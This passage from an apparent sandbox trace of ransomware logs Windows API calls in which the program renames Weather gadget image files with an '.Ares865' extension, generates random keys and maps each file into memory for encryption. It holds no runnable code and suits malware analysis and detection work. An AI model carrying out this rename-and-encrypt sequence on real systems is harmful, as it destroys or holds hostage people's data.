hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.806] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.807] CloseHandle (hObject=0x170) returned 1 [0115.807] CloseHandle (hObject=0x118) returned 1 [0115.807] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png.Ares865") returned 82 [0115.807] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\3.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\3.png.ares865"), dwFlags=0x1) returned 1 [0115.808] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\3.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.808] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5206) returned 1 [0115.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.809] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.809] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.809] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.810] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1760, lpName=0x0) returned 0x170 [0115.812] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1760) returned 0x190000 [0115.813] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.814] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.814] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.814] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.814] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png.Ares865") returned 83 [0115.814] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\30.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\30.png.ares865"), dwFlags=0x1) returned 1 [0115.816] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\30.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.816] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4112) returned 1 [0115.816] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.817] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.817] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.817] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.818] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1310, lpName=0x0) returned 0x170 [0115.821] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1310) returned 0x190000 [0115.822] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.822] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.822] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.823] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png.Ares865") returned 83 [0115.823] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\31.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\31.png.ares865"), dwFlags=0x1) returned 1 [0115.825] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\31.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.825] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5855) returned 1 [0115.825] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.826] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.826] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.826] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x19e0, lpName=0x0) returned 0x170 [0115.828] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x19e0) returned 0x190000 [0115.829] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.830] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.830] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.831] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png.Ares865") returned 83 [0115.831] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\32.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\32.png.ares865"), dwFlags=0x1) returned 1 [0115.832] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\32.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.832] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5855) returned 1 [0115.832] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.833] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.833] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.833] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x19e0, lpName=0x0) returned 0x170 [0115.835] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x19e0) returned 0x190000 [0115.836] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.836] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.836] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.837] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png.Ares865") returned 83 [0115.837] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\33.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\33.png.ares865"), dwFlags=0x1) returned 1 [0115.838] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\33.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.838] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4112) returned 1 [0115.839] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.839] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.839] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.840] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1310, lpName=0x0) returned 0x170 [0115.841] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1310) returned 0x190000 [0115.842] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.843] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.843] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.843] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png.Ares865") returned 83 [0115.844] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\34.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\34.png.ares865"), dwFlags=0x1) returned 1 [0115.845] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\34.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.845] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4112) returned 1 [0115.845] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.846] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.846] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.846] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1310, lpName=0x0) returned 0x170 [0115.847] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1310) returned 0x190000 [0115.848] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.849] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.849] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.850] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png.Ares865") returned 83 [0115.850] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\35.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\35.png.ares865"), dwFlags=0x1) returned 1 [0115.852] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\35.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.852] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5457) returned 1 [0115.852] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.853] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.853] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.853] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1860, lpName=0x0) returned 0x170 [0115.854] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1860) returned 0x190000 [0115.861] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.864] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.864] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.865] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png.Ares865") returned 83 [0115.867] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\36.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\36.png.ares865"), dwFlags=0x1) returned 1 [0115.870] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\36.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.870] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5855) returned 1 [0115.871] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.871] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.871] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.872] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x19e0, lpName=0x0) returned 0x170 [0115.873] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x19e0) returned 0x190000 [0115.874] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.875] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.875] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.875] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png.Ares865") returned 83 [0115.875] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\37.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\37.png.ares865"), dwFlags=0x1) returned 1 [0115.876] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\37.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.877] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5206) returned 1 [0115.877] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.878] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.878] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.878] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1760, lpName=0x0) returned 0x170 [0115.879] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1760) returned 0x190000 [0115.880] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.881] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.881] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.881] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png.Ares865") returned 83 [0115.881] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\38.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\38.png.ares865"), dwFlags=0x1) returned 1 [0115.886] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\38.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.886] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5206) returned 1 [0115.886] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.887] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.887] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.887] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1760, lpName=0x0) returned 0x170 [0115.888] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1760) returned 0x190000 [0115.889] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.890] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.890] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.891] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png.Ares865") returned 83 [0115.891] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\39.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\39.png.ares865"), dwFlags=0x1) returned 1 [0115.892] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\39.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.892] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5457) returned 1 [0115.892] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.893] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.893] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.893] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1860, lpName=0x0) returned 0x170 [0115.894] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1860) returned 0x190000 [0115.895] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.896] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.896] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.897] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png.Ares865") returned 82 [0115.897] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\4.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\4.png.ares865"), dwFlags=0x1) returned 1 [0115.898] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\4.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.898] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: 